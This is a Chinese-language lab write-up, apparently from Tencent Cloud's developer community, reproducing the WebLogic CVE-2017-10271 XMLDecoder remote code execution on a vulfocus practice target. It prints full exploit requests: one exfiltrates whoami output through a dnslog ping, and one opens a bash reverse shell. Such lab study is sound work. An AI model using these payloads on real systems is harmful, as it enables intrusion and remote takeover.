CVE-2017-10271 Weblogic远程代码执行漏洞
原创CVE-2017-10271 Weblogic远程代码执行漏洞
原创
用户8478947
发布于 2022-12-29 16:54:16
发布于 2022-12-29 16:54:16
漏洞简介
事项 | 描述 |
|---|---|
漏洞概述 | WebLogic WLS组件中存在CVE-2017-10271远程代码执行漏洞,可以构造请求对运行WebLogic中间件的主机进行攻击 |
影响范围 | 10.3.6.0.0 12.1.3.0.0 12.2.1.1.0 12.2.1.2.0 |
漏洞编号 | CVE-2017-10271 |
漏洞搭建
这里使用vulfocus进行复现。
image-20221222175051938
漏洞复现
访问http://192.168.146.167:35113/wls-wsat/CoordinatorPortType,发现访问成功,说明存在漏洞。
image-20221222175249439
抓包,修改恶意payload
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.146.167:35113
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=zjJnjkFGT6c7wV1ymhhcbJKzzNJL2s22NKZL0tbRZzJL51Cc2By1!-1925820320; ADMINCONSOLESESSION=k3GKjkbQ11p0nJs2GXsr1b2KXNtxCJ2ntJbLJ7HxnmKF1J3YnTJX!-971490304
Upgrade-Insecure-Requests: 1
Content-Type: text/xml [修改的]
Content-Length: 611
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>ping `whoami`.o9lng5.dnslog.cn</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
image-20221222175519657
在dnslog查看是否成功执行whoami命令,发现成功执行whoami
image-20221222175622572
既然可以执行命令,可以尝试反弹shell。需要注意的是,反弹shell的&需要进行编码转换。
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.146.167:35113
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=zjJnjkFGT6c7wV1ymhhcbJKzzNJL2s22NKZL0tbRZzJL51Cc2By1!-1925820320; ADMINCONSOLESESSION=k3GKjkbQ11p0nJs2GXsr1b2KXNtxCJ2ntJbLJ7HxnmKF1J3YnTJX!-971490304
Upgrade-Insecure-Requests: 1
Content-Type: text/xml [修改的]
Content-Length: 634
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i >& /dev/tcp/192.168.146.167/9999 0>&1</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
image-20221222175911264
反弹shell成功。
image-20221222175941925
查找flag位置。
image-20221222180221243
过关。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
评论
登录后参与评论
推荐阅读